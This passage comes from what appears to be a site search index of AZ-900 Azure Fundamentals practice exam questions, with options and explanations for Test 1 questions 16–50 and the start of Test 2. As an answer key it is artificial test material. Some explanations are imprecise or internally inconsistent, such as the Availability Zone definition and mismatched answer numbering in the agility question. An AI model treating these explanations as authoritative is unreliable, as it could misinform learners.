        While the other options can be true in certain cases, they aren't inherently beneficial aspects of the consumption-based model. The cost predictability can be challenging due to the variable nature of usage (Answer 1), it's not always cheaper (Answer 2) as it depends on the resource usage pattern, and the simplicity of the pricing model (Answer 4) depends on the specific terms and conditions of the service provider. Therefore, the most accurate and generalizable benefit is the potential for cost savings with infrequent or variable resource use. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/functions-consumption-costs

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-in-microsoft-azure-which-tool-or-service-allows-for-the-organization-and-management-of-multiple-subscriptions-within-hierarchical-structures","title":"Question 16: In Microsoft Azure, which tool or service allows for the organization and management of multiple subscriptions within hierarchical structures?","text":"
        • RBAC (Role-Based Access Control)
        • Management Groups
        • Azure Active Directory
        • Resource Groups

        Explanation: The correct answer is\u00a0Management Groups. In Azure, Management Groups provide a way to manage access, policies, and compliance for multiple subscriptions. They can be structured into a hierarchy for the organization's needs. All subscriptions within a Management Group automatically inherit the conditions applied to the Management Group, facilitating governance on a large scale.

        Resource Groups, on the other hand, are containers for resources deployed on Azure. They do not provide management capabilities across multiple subscriptions.

        RBAC (Role-Based Access Control)\u00a0is a system that provides fine-grained access management to Azure resources but it doesn't inherently support the organization of subscriptions into hierarchies.

        Azure Active Directory\u00a0is a service that provides identity and access management capabilities but does not provide a direct mechanism for managing multiple subscriptions in nested hierarchies.

        Hence, Management Groups is the correct answer as it directly allows for the management and organization of multiple subscriptions into nested hierarchies, which the other options do not. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/management-groups/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-which-feature-of-azure-active-directory-will-require-users-to-have-their-mobile-phone-in-order-to-be-able-to-log-in","title":"Question 17:\u00a0Which feature of Azure Active Directory will require users to have their mobile phone in order to be able to log in?","text":"
        • Azure Security Center
        • Multi-Factor Authentication
        • Azure Information Protection (AIP)
        • Advanced Threat Protection (ATP)

        Explanation: Multi-Factor Authentication (MFA) - the concept of having something additional to a \u201cpassword\u201d that is required to log in; passwords are find-able or guessable; but having your mobile phone on you to receive a phone call, text or run an app to get a code is harder for an unknown hacker to get. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-who-is-responsible-for-the-security-of-the-physical-servers-in-an-azure-data-center","title":"Question 18: Who is responsible for the security of the physical servers in an Azure data center?","text":"
        • Azure is responsible for securing the physical data centers
        • I am responsible for securing the physical data centers

        Explanation: Azure is responsible for physical security. See:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/physical-security

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-true-or-false-azure-is-a-public-cloud-and-has-no-private-cloud-offerings","title":"Question 19:\u00a0True or False: Azure is a public cloud, and has no private cloud offerings","text":"
        • TRUE
        • FALSE

        Explanation: The correct answer is FALSE. While Azure is indeed widely recognized as a public cloud provider, offering a vast array of services accessible via the internet on a multi-tenant basis, it does also provide private cloud capabilities. One notable offering is Azure Stack, an extension of Azure that allows businesses to run apps in an on-premises environment and deliver Azure services in their datacenter. With Azure Stack, you get the flexibility of using Azure\u2019s cloud capabilities while maintaining your own datacenter for privacy, regulatory compliance, or other requirements. Additionally, Azure offers services such as Azure Private Link, which provides private connectivity from a virtual network to Azure services, and Azure ExpressRoute, a service that enables a private, dedicated network connection to Azure. So, contrary to the statement, Azure does have private cloud offerings along with its public cloud, making the statement FALSE. See:\u00a0

        • https://azure.microsoft.com/en-us/overview/what-is-a-private-cloud/
        • https://azure.microsoft.com/en-us/global-infrastructure/government/
        • https://azure.microsoft.com/en-us/overview/azure-stack/
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-who-is-responsible-for-the-security-of-your-azure-storage-account-access-keys","title":"Question 20:\u00a0Who is responsible for the security of your Azure Storage account access keys?","text":"
        • Azure is responsible for securing the access keys
        • I am responsible for securing the access keys

        Explanation: Customers are responsible to secure the access keys they are given and regenerate them if they are exposed. See:\u00a0https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-which-feature-within-azure-collects-all-of-the-logs-from-various-resources-into-a-central-dashboard-where-you-can-run-queries-view-graphs-and-create-alerts-on-certain-events","title":"Question 21:\u00a0Which feature within Azure collects all of the logs from various resources into a central dashboard, where you can run queries, view graphs, and create alerts on certain events?","text":"
        • Azure Portal Dashboard
        • Azure Monitor
        • Azure Security Center
        • Storage Account or Event Hub

        Explanation: Azure Monitor - a centralized dashboard that collects all the logs, metrics and events from your resources. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-when-establishing-a-site-to-site-vpn-connection-with-azure-what-kind-of-network-device-needs-to-be-present-or-installed-in-your-companys-on-premises-network-infrastructure","title":"Question 22: When establishing a Site-to-Site VPN connection with Azure, what kind of network device needs to be present or installed in your company's on-premises network infrastructure?","text":"
        • An Azure Virtual Network
        • An Application Gateway
        • A dedicated virtual machine
        • A compatible VPN Gateway device

        Explanation: The correct answer is a compatible VPN Gateway device. In order to establish a site-to-site VPN connection with Azure, a VPN Gateway is required on your company's internal network. A VPN Gateway is a specific type of virtual network gateway that sends encrypted traffic across a public network, like the Internet. While the name might suggest it's a purely virtual entity, in practice, the term \"VPN Gateway\" often refers to a hardware device that's installed on-premises in your data center. This device uses Internet Protocol security (IPsec) to establish a secure, encrypted connection to the Azure VPN Gateway, which resides in the Azure virtual network. This setup allows your local network and Azure to interact as if they're directly connected. In contrast, virtual machines, virtual networks, and application gateways are other types of Azure resources, but they do not facilitate creating a site-to-site VPN connection. It's important to note that your company's internal network hardware and settings must meet specific requirements to support a VPN Gateway. See:\u00a0https://docs.microsoft.com/en-us/azure/vpn-gateway/vpn-gateway-howto-site-to-site-resource-manager-portal

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-which-of-the-following-is-something-that-azure-cognitive-services-api-can-currently-do","title":"Question 23:\u00a0Which of the following is something that Azure Cognitive Services API can currently do?","text":"
        • Translate text from one language to another
        • All of these! Azure can do it all!
        • Speak text in an extremely realistic way
        • Create text from audio
        • Recognize text in an image

        Explanation: Azure can do all of them, of course. See:\u00a0https://docs.microsoft.com/en-us/azure/cognitive-services/welcome

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-which-of-the-following-azure-features-is-most-likely-to-deliver-the-most-immediate-savings-when-it-comes-to-reducing-azure-costs","title":"Question 24:\u00a0Which of the following Azure features is most likely to deliver the most immediate savings when it comes to reducing Azure costs?","text":"
        • Changing your storage accounts from globally redundant (GRS) to locally redundant (LRS)
        • Auto shutdown of development and QA servers over night and on weekends
        • Using Azure Reserved Instances for most of your virtual machines
        • Using Azure Policy to restrict the user of expensive VM SKUs

        Explanation: Reserved Instances often offer 40% or more savings off of the price of pay-as-you-go virtual machines. See:\u00a0https://docs.microsoft.com/en-us/azure/cost-management-billing/reservations/save-compute-costs-reservations

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-in-the-context-of-azures-high-availability-solutions-what-is-the-primary-purpose-of-azure-availability-zones","title":"Question 25:\u00a0In the context of Azure's high availability solutions, what is the primary purpose of Azure Availability Zones?","text":"
        • They serve as a folder structure in Azure used for organizing resources such as databases, virtual machines, and virtual networks.
        • They are synonymous with an Azure region.
        • They allow manual selection of data centers for virtual machine placement to achieve superior availability compared to other options.
        • They represent certain server racks within individual data centers, specifically designed by Azure for higher uptime.

        Explanation: The correct answer is: \"They allow manual selection of data centers for virtual machine placement to achieve superior availability compared to other options.\"

        Azure Availability Zones are a high availability offering that protects applications and data from datacenter failures. Each Azure region is composed of multiple datacenters, and each datacenter is essentially an Availability Zone. They are unique physical locations within a region, equipped with their own independent power, cooling, and networking. By placing your resources across different Availability Zones within a region, you can protect your apps and data from the failure of a single datacenter. If one datacenter goes down, the resources in the other datacenters (Availability Zones) can continue to operate, providing redundancy and increasing the overall availability of your applications. It's important to note that these zones are not the same as Azure regions (which are geographical areas containing one or more datacenters), nor are they equivalent to resource groups (which are logical containers for resources deployed on Azure). They are also not isolated to specific racks within a datacenter, but rather spread across different datacenters in a region, offering a broader scope of protection. See:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-which-of-the-following-characteristics-is-essential-for-a-system-to-be-considered-highly-available-in-a-cloud-computing-environment","title":"Question 26:\u00a0Which of the following characteristics is essential for a system to be considered highly available in a cloud computing environment?","text":"
        • The system must maintain 100% availability at all times.
        • The system must be designed for resilience, with no single points of failure.
        • It's impossible to create a highly available system.
        • The system must operate on a minimum of two virtual machines.

        Explanation: The correct answer is \"A system specifically designed to be resilient, with no single point of failures\". High availability in a system means that it is designed to operate continuously without failure for a long period of time. This is achieved by building redundancy into the system, eliminating single points of failure, and enabling rapid recovery from any failures that do occur. In other words, even if a component of the system fails, there are other components that can take over, allowing the system to continue operating seamlessly. While high availability often aims for close to 100% uptime, the claim of maintaining 100% availability is practically unrealistic due to factors like maintenance needs and unexpected failures. Also, having a minimum of two VMs may contribute to high availability but isn't a definitive requirement \u2014 it depends on the specifics of the system architecture. Finally, the assertion that it's not possible to create a highly available system is incorrect. There are established strategies and technologies for designing and operating highly available systems, and they are widely used in mission-critical applications across many industries. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/windows/availability

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-in-the-context-of-cloud-computing-how-is-the-benefit-of-agility-best-described","title":"Question 27: In the context of cloud computing, how is the benefit of 'agility' best described?","text":"
        • It refers to the ability to swiftly recover from a large-scale regional failure.
        • It refers to the ability to quickly respond to and drive changes in the market.
        • It refers to the system's ability to easily scale up when it reaches full capacity.
        • It refers to the ability to rapidly provision new resources.

        Explanation: The correct answer is \"It refers to the ability to quickly respond to and drive changes in the market\". Agility, in the context of cloud computing, refers to the ability of an organization to rapidly adapt to market and environmental changes in productive and cost-effective ways. It involves quickly adjusting and adapting strategic and operational capabilities to respond to and take advantage of changes in the business environment. The other options, while also benefits of the cloud, do not directly align with the concept of agility. Spinning up new resources quickly (Answer 2) or growing capacity easily when full (Answer 3) relate more to the cloud's scalability and elasticity. The ability to recover from a region-wide failure rapidly (Answer 4) speaks to the cloud's resilience and disaster recovery capabilities. While these aspects can contribute to overall business agility, they don't encapsulate the broader strategic meaning of agility - the capacity to quickly adjust to market changes, which can include shifts in customer demand, competitive pressures, or regulatory changes, among others. Hence, the ability to respond to and drive market change quickly is the most accurate answer. See:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/strategy/business-outcomes/agility-outcomes

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-if-you-wanted-to-simply-use-azure-as-an-extension-of-your-own-datacenter-not-primarily-hosting-anything-there-but-using-it-for-extra-storage-or-taking-advantage-of-some-services-what-hosting-model-is-that-called","title":"Question 28: If you wanted to simply use Azure as an extension of your own datacenter, not primarily hosting anything there but using it for extra storage or taking advantage of some services, what hosting model is that called?","text":"
        • Public cloud
        • Hybrid cloud
        • Private cloud

        Explanation: The correct answer is \"Hybrid cloud.\" The scenario described in the question is a typical use case for a hybrid cloud model, which integrates private cloud or on-premises infrastructure with public cloud resources, such as those provided by Azure. In a hybrid cloud model, businesses can keep sensitive data or critical applications on their private cloud or on-premises datacenter for security and compliance reasons while using the public cloud's vast resources for additional storage, computational power, or specific services when necessary. This not only allows for greater flexibility and scalability, but also offers potential cost savings. In contrast, a purely public cloud model involves hosting all data and applications on a public cloud provider's infrastructure, and a purely private cloud model involves hosting everything on a business's own infrastructure or a rented, single-tenant infrastructure. The described scenario of extending an on-premises datacenter with Azure services fits best with the hybrid cloud model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-hybrid-cloud-computing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-in-the-context-of-cloud-computing-a-virtual-machine-vm-is-primarily-associated-with-which-type-of-cloud-hosting-model","title":"Question 29: In the context of cloud computing, a virtual machine (VM) is primarily associated with which type of cloud hosting model?","text":"
        • Software as a Service (SaaS)
        • Infrastructure as a Service (IaaS)
        • Platform as a Service (PaaS)

        Explanation: The correct answer is IaaS, which stands for Infrastructure as a Service. In the context of cloud computing, a virtual machine (VM) is typically provided as part of an IaaS offering. With IaaS, the provider manages the underlying physical infrastructure (like servers, network equipment, and storage), while the consumer controls the virtualized components of the infrastructure, such as the virtual machines, their operating systems, and the applications running on them. This is contrasted with the other options. In a Platform as a Service (PaaS) model, the consumer only controls the applications and possibly some configuration settings for the application-hosting environment, but does not manage the operating system, server hardware, or network infrastructure. Similarly, in a Software as a Service (SaaS) model, the consumer only uses the software and does not control any aspect of the infrastructure or platform where the application runs. Therefore, given that a virtual machine involves control over the operating system and applications within a cloud-managed infrastructure, it aligns with the IaaS hosting model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-which-of-the-following-best-describes-the-primary-benefit-of-a-content-delivery-network-cdn-in-a-cloud-computing-context","title":"Question 30:\u00a0Which of the following best describes the primary benefit of a Content Delivery Network (CDN) in a cloud computing context?","text":"
        • For a nominal fee, Azure will manage your virtual machine, perform OS updates, and ensure optimal performance.
        • It mitigates server load for static, unchanging files like images, videos, and PDFs by distributing them across a network of servers.
        • It enables temporary session information storage for web visitors, such as their login ID or name.
        • It provides fast and inexpensive data retrieval for later use.

        Explanation: The correct answer, \"It mitigates server load for static, unchanging files\", is indeed the core benefit of a Content Delivery Network (CDN). A CDN stores copies of a website's static files on servers distributed globally. These static files could be anything that doesn't change frequently, like images, CSS, JavaScript, videos, etc. When a user visits the site, they are served these static files from the CDN server nearest to them geographically. This reduces the latency, as the data has a shorter distance to travel. Additionally, it reduces the load on the original server because the CDN handles a significant portion of the traffic. As a result, not only is the user experience improved due to faster load times, but the operational efficiency and performance of the original server are also enhanced. Therefore, CDNs are essential for sites serving large amounts of static content to a geographically dispersed user base. See:\u00a0https://docs.microsoft.com/en-us/azure/cdn/cdn-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-what-is-the-name-of-the-group-of-services-inside-azure-that-hosts-the-apache-hadoop-big-data-analysis-tools","title":"Question 31: What is the name of the group of services inside Azure that hosts the Apache Hadoop big data analysis tools?","text":"
        • Azure Hadoop Services
        • Azure Data Factory
        • HDInsight
        • Azure Kubernetes Services

        Explanation: The correct answer is HDInsight. HDInsight is Microsoft Azure's offering for hosting the Apache Hadoop big data analysis tools. Apache Hadoop is an open-source software platform that supports data-intensive distributed applications. This platform enables processing large amounts of data across clusters of computers. Azure HDInsight is a cloud distribution of the Hadoop components from the Hortonworks Data Platform. It allows Azure users to process vast amounts of data with popular open-source frameworks such as Hadoop, Hive, HBase, Storm, and others. Additionally, the HDInsight service also supports R, Python, Scala, and .NET. So, it's not just limited to traditional Hadoop tools. Options like 'Azure Hadoop Services' and 'Azure Data Factory' are incorrect as Azure doesn't have a service named 'Azure Hadoop Services' and 'Azure Data Factory' is a cloud-based data integration service. 'Azure Kubernetes Services' is a service for managing containerized applications, not specifically for Hadoop. See:\u00a0https://azure.microsoft.com/en-us/services/hdinsight/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-within-the-landscape-of-cloud-service-models-how-would-microsofts-outlook-365-be-best-categorized","title":"Question 32: Within the landscape of cloud service models, how would Microsoft's Outlook 365 be best categorized?","text":"
        • Infrastructure as a Service (IaaS)
        • Software as a Service (SaaS)
        • Platform as a Service (PaaS)

        Explanation: The correct answer is SaaS, which stands for Software as a Service. Outlook 365, part of Microsoft's Office 365 suite, is a cloud-based service that provides access to various applications and services, including email, calendars, and contact management, which are delivered over the internet. In a SaaS model, the service provider is responsible for the infrastructure, platform, and software, and ensures their maintenance and updates. Users simply access the services via a web browser or app, without needing to worry about the underlying infrastructure, platform, or software updates. This contrasts with Infrastructure as a Service (IaaS), where the user is responsible for managing the operating systems, middleware, and applications, and Platform as a Service (PaaS), where the user manages only the applications and data. In both these models, the users have more responsibilities compared to SaaS. Since Outlook 365 is a software application delivered over the web with all underlying infrastructure and platform taken care of by Microsoft, it falls into the SaaS hosting model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-saas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-which-major-cloud-provider-offers-the-most-international-locations-for-customers-to-provision-virtual-machines-and-other-servers","title":"Question 33:\u00a0Which major cloud provider offers the most international locations for customers to provision virtual machines and other servers?","text":"
        • Microsoft Azure
        • Google Cloud Platform
        • Amazon AWS

        Explanation: Microsoft Azure offers the most extensive global coverage among major cloud providers regarding geographical regions. This allows customers to provision virtual machines, databases, and other services in various international locations closer to their user base, which can enhance performance, reduce latency, and comply with local regulations regarding data residency. While AWS (Amazon Web Services) and GCP (Google Cloud Platform) also provide many regions globally, Microsoft Azure has distinguished itself with the broadest regional availability. See:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/regions/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-which-azure-website-tool-is-available-for-you-to-estimate-the-future-costs-of-your-azure-products-and-services-by-adding-products-to-a-shopping-basket-and-helping-you-calculate-the-costs","title":"Question 34:\u00a0Which Azure website tool is available for you to estimate the future costs of your Azure products and services by adding products to a shopping basket and helping you calculate the costs?","text":"
        • Azure Pricing Calculator
        • Microsoft Docs
        • Azure Advisor

        Explanation: Azure Pricing Calculator lets you attempt to calculate your future bill based on resources you select and your estimates of usage. See:\u00a0https://azure.microsoft.com/en-us/pricing/calculator/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-what-is-the-name-of-azures-hosted-sql-database-service","title":"Question 35:\u00a0What is the name of Azure's hosted SQL database service?","text":"
        • SQL Server in a VM
        • Table Storage
        • Cosmos DB
        • Azure SQL Database

        Explanation: SQL Database is a SQL Server compatible option in Azure, a database as a service. See:\u00a0https://docs.microsoft.com/en-us/azure/sql-database/sql-database-technical-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-true-or-false-you-cannot-have-more-than-one-azure-subscription-per-company","title":"Question 36:\u00a0True or false: You cannot have more than one Azure subscription per company","text":"
        • TRUE
        • FALSE

        Explanation: You can have multiple subscriptions, as a way to separate out resources between billing units, business groups, or for any reason you wish. See:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/decision-guides/subscriptions/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-can-you-give-someone-else-access-to-your-azure-subscription-without-giving-them-your-user-name-and-password","title":"Question 37:\u00a0Can you give someone else access to your Azure subscription without giving them your user name and password?","text":"
        • YES
        • NO

        Explanation: Yes, anyone can create their own Azure account and you can give them access to your subscription with granular control as to permissions. See:\u00a0https://docs.microsoft.com/en-us/azure/role-based-access-control/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-true-or-false-you-can-create-your-own-policies-if-built-in-azure-policy-is-not-sufficient-to-your-needs","title":"Question 38:\u00a0True or false: you can create your own policies if built-in Azure Policy is not sufficient to your needs","text":"
        • FALSE
        • TRUE

        Explanation: True, you can create custom policies using JSON. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/tutorials/create-custom-policy-definition

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-in-the-context-of-azures-service-level-agreement-sla-for-virtual-machines-which-of-the-following-deployment-strategies-would-offer-the-highest-level-of-availability","title":"Question 39:\u00a0In the context of Azure's Service Level Agreement (SLA) for virtual machines, which of the following deployment strategies would offer the highest level of availability?","text":"
        • Deploying two or more virtual machines across different availability zones within the same region.
        • Deploying two or more virtual machines within the same data center.
        • Deploying two or more virtual machines within an availability set.
        • Deploying a single virtual machine.

        Explanation: The correct answer is \"Deploying two or more virtual machines across different availability zones within the same region\".

        Service Level Agreement (SLA) is a commitment by a service provider on the level of service - like uptime, performance, or other key metrics - that users can expect. Azure provides an SLA for various services, including Virtual Machines. A single VM, even with premium storage, provides a lesser SLA compared to VMs deployed in an Availability Set or across Availability Zones. While using an Availability Set (two or more VMs in the same datacenter but across fault and update domains) provides a higher SLA than a single VM, the highest SLA is provided when two or more VMs are deployed across Availability Zones in the same region. Availability Zones are unique physical locations within a region. Each zone is made up of one or more datacenters equipped with independent power, cooling, and networking. They are set up to be an isolation boundary - if one zone goes down, the other continues working. This distribution of VMs across zones provides high availability and resiliency, hence offering the highest SLA. See:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-is-the-basic-way-of-protecting-an-azure-virtual-network-subnet","title":"Question 40: What is the basic way of protecting an Azure Virtual Network subnet?","text":"
        • Network Security Group
        • Azure DDos Standard protection
        • Azure Firewall
        • Application Gateway with WAF

        Explanation: Network Security Group (NSG) - a fairly basic set of rules that you can apply to both inbound traffic and outbound traffic that lets you specify what sources, destinations, and ports are allowed to travel through from outside the virtual network to inside the virtual network. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/security-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-true-or-false-formal-support-is-not-included-in-private-preview-mode","title":"Question 41:\u00a0True or false: Formal support is not included in private preview mode.","text":"
        • FALSE
        • TRUE

        Explanation: True. Preview features are not fully ready and this phase does not include formal support. See:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-true-or-false-azure-has-the-responsibility-to-manage-the-hardware-in-the-infrastructure-as-a-service-model","title":"Question 42:\u00a0True or False: Azure has the responsibility to manage the hardware in the Infrastructure as a Service model","text":"
        • TRUE
        • FALSE

        Explanation: The correct answer is TRUE. In an Infrastructure as a Service (IaaS) model, the cloud service provider, in this case Microsoft Azure, is responsible for managing the underlying physical hardware. This includes servers, storage, networking hardware, and the virtualization layer. Azure ensures that these resources are available and maintained, providing capabilities like automated backup, disaster recovery, and scaling. The customer, on the other hand, is responsible for managing the software components of the service, including the operating system, middleware, runtime, data, and applications. This arrangement allows customers to focus on their core business and application development without worrying about the physical infrastructure's procurement, management, and maintenance. It's important to remember that the division of responsibilities may change in other service models like Platform as a Service (PaaS) or Software as a Service (SaaS), where the cloud service provider manages more layers of the technology stack. But for IaaS, the provider indeed manages the hardware, making the statement TRUE. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-what-is-single-sign-on","title":"Question 43: What is Single Sign-On?","text":"
        • When you sign in to an application, it remembers who you are the next time you go there.
        • The ability to use an existing user id and password to sign in other applications, and not have to create/memorize a new one.
        • When an application outsources (federates) it's identity service to a third-party platform

        Explanation: Single Sign-On - the ability to use the same user id and password to log into every application that your company has; enabled by Azure AD. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/what-is-single-sign-on

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-an-it-administrator-has-the-requirement-to-control-access-to-a-specific-app-resource-using-multi-factor-authentication-what-azure-service-satisfies-this-requirement","title":"Question 44:\u00a0An IT administrator has the requirement to control access to a specific app resource using multi-factor authentication. What Azure service satisfies this requirement?","text":"
        • Azure Authentication
        • Azure Function
        • Azure AD
        • Azure Authorization

        Explanation: You can use Azure AD to control access to your apps and your app resources, based on your business requirements. In addition, you can use Azure AD to require multi-factor authentication when accessing important organizational resources. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-is-the-main-management-tool-used-for-managing-azure-resources-with-a-graphical-user-interface","title":"Question 45:\u00a0What is the MAIN management tool used for managing Azure resources with a graphical user interface?","text":"
        • Remote Desktop Protocol (RDP)
        • PowerShell
        • Azure Storage Explorer
        • Azure Portal

        Explanation: Azure Portal is the website used to manage your resources in Azure. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-portal/azure-portal-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-what-is-the-default-amount-of-credits-that-you-are-given-when-you-first-create-an-azure-free-account","title":"Question 46:\u00a0What is the default amount of credits that you are given when you first create an Azure Free account?","text":"
        • The default is US$200
        • You can create 1 Linux VM, 1 Windows VM, and a number of other free services for the first year.
        • You are given $50 per month, for one year towards Azure services
        • Azure does not give you any free credits when you create a free account

        Explanation: There are some other benefits to a free account, but you get US$200 to spend in the first month. See:\u00a0https://azure.microsoft.com/free

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-azure-services-can-go-through-several-phases-in-a-service-lifecycle-what-are-the-three-phases-called","title":"Question 47:\u00a0Azure Services can go through several phases in a Service Lifecycle. What are the three phases called?","text":"
        • Preview Phase, General Availability Phase, and Unpublished
        • Private Preview, Public Preview, and General Availability
        • Development phase, QA phase, and Live phase
        • Announced, Coming Soon, and Live

        Explanation: Private Preview, Public Preview, and General Availability.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-what-is-azures-preferred-identityauthentication-service","title":"Question 48:\u00a0What is Azure's preferred Identity/authentication service?","text":"
        • Network Security Group
        • Facebook Connect
        • Live Connect
        • Azure Active Directory

        Explanation: Azure Active Directory (Azure AD) - Microsoft\u2019s preferred Identity as a Service solution. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-tool-within-azure-helps-you-to-track-your-compliance-with-various-international-standards-and-government-laws","title":"Question 49:\u00a0Which tool within Azure helps you to track your compliance with various international standards and government laws?","text":"
        • Microsoft Privacy Statement
        • Service Trust Portal
        • Compliance Manager
        • Azure Government Services

        Explanation: Compliance Manager will track your own compliance with various standards and laws. See:\u00a0https://techcommunity.microsoft.com/t5/security-privacy-and-compliance/announcing-compliance-manager-general-availability/ba-p/161922

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-which-of-the-following-is-a-feature-of-the-cool-access-tier-for-azure-storage","title":"Question 50:\u00a0Which of the following is a feature of the cool access tier for Azure Storage?","text":"
        • Much cheaper to store your files than the hot access tier
        • Most expensive option when it comes to bandwidth cost to access your files
        • Cheapest option when it comes to bandwidth costs to access your files
        • Significant delays in accessing your data, up to several hours

        Explanation: Cool access tier offers cost savings when you expect to store your files and not need to access them often. See:\u00a0https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-storage-tiers?tabs=azure-portal

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-2","title":"Test 2","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-which-of-the-following-scenarios-would-azure-policy-be-a-recommended-method-for-enforcement","title":"Question 1: Which of the following scenarios would Azure Policy be a recommended method for enforcement?","text":"
        • Allow only one specific roles of users to have access to a resource group
        • Add an additional prompt when creating a resource without a specific tag to ask the user if they are really sure they want to continue?
        • Prevent certain Azure Virtual Machine instance types from being used in a resource group
        • Require a virtual machine to always update to the latest security patches

        Explanation: Azure Policy can add restrictions on storage account SKUs, virtual machine instance types, and rules relating to tagging of resources and groups. It cannot prompt a user to ask them if they are sure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-select-the-ways-to-increase-the-security-of-a-traditional-user-id-and-password-system","title":"Question 2:\u00a0Select the way(s) to increase the security of a traditional user id and password system?","text":"
        • Use multi-factor authentication which requires an additional device (something you have) to verify identity.
        • Require longer and more complex passwords.
        • Do not allow users to log into an application except using a company registered device.
        • Require users to change their passwords more frequently.

        Explanation: All of these are ways to increase the security on an account. For more info: - https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-password-ban-bad - https://docs.microsoft.com/en-us/azure/active-directory-domain-services/password-policy - https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-sspr-policy

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-besides-azure-service-health-where-else-can-you-find-out-any-issues-that-affect-the-azure-global-network-that-affect-you","title":"Question 3:\u00a0Besides Azure Service Health, where else can you find out any issues that affect the Azure global network that affect you?","text":"
        • Install the Azure app on your phone
        • Azure will email you
        • Azure Updates Blog
